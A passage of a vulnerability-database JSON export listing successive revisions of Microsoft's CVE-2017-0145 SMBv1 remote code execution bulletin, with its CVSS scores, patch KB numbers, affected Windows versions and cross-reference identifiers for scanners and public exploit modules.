"RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", 
"RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4013198", "KB4012598", "KB4014077", "KB4012606", "KB3210720", "KB3210721", "KB4012214", "KB3177186", "KB3212646", "KB4012216", "KB4012215", "KBMS16-110, 3187754", "KB3213986", "KB4012217", "KB3205401", "KB4013429", "KB4012212", "KB4012213"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": 
"KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based 
systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 
2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", 
"kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": 
"KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T10:52:46", "differentElements": ["msAffectedSoftware"], "edition": 51}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, 
"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-17T12:43:31", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", 
"idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB4012212", "KB3205409", "KB4014077", "KB4012214", "KB4012606", "KB4012598", "KB3213986", "KB3205401", "KB4012217", "KB4012215", "KB3210720", "KB3210721", "KBMS16-110, 3187754", "KB4013429", "KB4012216", "KB3212646", "KB3177186", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core 
installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", 
"msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T12:43:31", "differentElements": ["msAffectedSoftware"], "edition": 52}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": 
{"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-17T16:50:29", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": 
["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB4012212", "KB3205409", "KB4014077", "KB4012214", "KB4012606", "KB4012598", "KB3213986", "KB3205401", "KB4012217", "KB4012215", "KB3210720", "KB3210721", "KBMS16-110, 3187754", "KB4013429", "KB4012216", "KB3212646", "KB3177186", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", 
"kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 
